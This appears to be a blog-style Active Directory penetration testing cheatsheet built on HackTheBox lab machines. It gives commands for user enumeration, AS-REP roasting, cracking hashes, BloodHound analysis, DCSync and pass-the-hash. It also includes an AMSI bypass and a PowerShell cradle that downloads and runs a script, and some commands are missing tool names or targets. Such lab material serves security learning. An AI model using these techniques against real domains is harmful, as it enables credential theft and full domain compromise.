Active Directory penetration testing cheatsheet


All you need to know to hack Active directory

As an example, here I used one of the htb boxes

1) Get the domain name:

crackmapexec smb

smbmap -H -u ‘’ -p ‘’

2) Try to get users’ lists: egotistical-bank.local/ -dc-ip -debug

Lightweight Directory Access Protocol (LDAP)

./ -U — full — dc-ip

The command above will list out all users in the domain.

3) Enumerate shares:

4) Get usernames’ lists from the website’s team’s names:

./username-anarchy — input-file fullnames.txt — select-format first,flast,first.last,firstl > unames.tx

5) Another attempt to get users’ list:

6) To get the domain base:

ldapsearch -x -h -s base namingcontexts

7) To get more information about domain:

ldapsearch -x -h -b ‘DC=EGOTISTICAL-BANK,DC=LOCAL’

8) Brute-force users on the domain:

kerbrute userenum -d EGOTISTICAL-BANK.LOCAL /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt — dc

9) Get Hash

I’ll use the list of users I collected from Kerbrute, and run to look for vulnerable users. Three come back as not vulnerable, but one gives a hash: ‘EGOTISTICAL-BANK.LOCAL/’ -usersfile users.txt -format hashcat -outputfile hashes.aspreroast -dc-ip

10) Crack Hash

hashcat -m 18200 hashes.aspreroast /usr/share/wordlists/rockyou.txt — force

11) Bloodhound

I ran winPEAS.exe again, but nothing new jumped out at me. Since there’s AD stuff going on, I went to Bloodhound.

Download / Install

I’ll clone the repository into /opt, and also got the latest release binary. I’ll start neo4j (apt install neo4j if it’s not already installed) with neo4j start, and then run Bloodhound. If you’re running as root, you’ll need the -no-sandbox flag.

If it’s a fresh install (or if you forget your password from a previous install, you can delete /usr/share/neo4j/data/dbms/auth and then it’s like a fresh install), I’ll need to change the neo4j password by running neo4j console, visiting the url it returns, and logging in with the default creds, neo4j/neo4j. It’ll force a password change them at that point. Now the BloodHound program can connect, thought first I need data.

Run SharpHound.exe

Before I can do analysis in BloodHound, I need to collect some data. I’ll grab SharpHound.exe from the injestors folder, and make a copy in my SMB share. Then I can run it right from there, and the output will write into the share as well:

Analyze Results

I’ll import the .zip file into BloodHound by clicking the Upload Data button on the top right. Tt reports success, leaving me at a blank page. There are canned queries that might be useful, but I like to start with the user(s) I already have access to. I’ll search for SVC_LOANMGR@EGOTISTICAL-BANK.LOCAL in the bar at the top left, and it comes up on the graph. On the left, I’ll want to look for Outbound Object Control - These are items that this user has rights over. In this case, there is one:

Clicking the “1” add that item to the graph:

This account has access to GetChanges and GetChangesAll on the domain. Googling that will quickly point to a low of articles on the DCSync attack, or I can right click on the label (you have to get in just the right spot) and get the menu for it:

Clicking help, there’s a Abuse Info tab that includes instructions for how to abuse this privilege:

12) DCSync


My preferred way to do a DCSync attack is using, which allows me to run DCSync attack from my Kali box, provided I can talk to the DC on TCP 445 and 135 and a high RPC port. This avoids fighting with AV, though it does create network traffic.

I need to give it just a target string in the format [username]:[password]@[ip]: ‘svc_loanmgr:Moneymakestheworldgoround!@’

13) Shell -hashes ‘aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff’ -dc-ip administrator@

DCSync Attack V2

net user john abc123! /add /domainnet group "Exchange Windows Permissions" john /addnet localgroup "Remote Management Users" john /add

The commands above create a new user named john and add him to the required groups. Next, download the PowerView script and import it into the current session.

menu > Bypass-4MSI

The Bypass-4MSI command is used to evade defender before importing the script. Next, we can use the Add-ObjectACL with john’s credentials, and give him DCSync rights.

IEX(New-Object Net.WebClient).downloadString('[<>](<>)')$pass = convertto-securestring 'abc123!' -asplain -force$cred = new-object'htb\\john', $pass)Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity john -Rights DCSync

After run: htb/john@

where htb is domain

The script from Impacket can now be run as john, and used to reveal the NTLM hashes for all domain users.

The obtained Domain Admin hash can be used to login via psexec.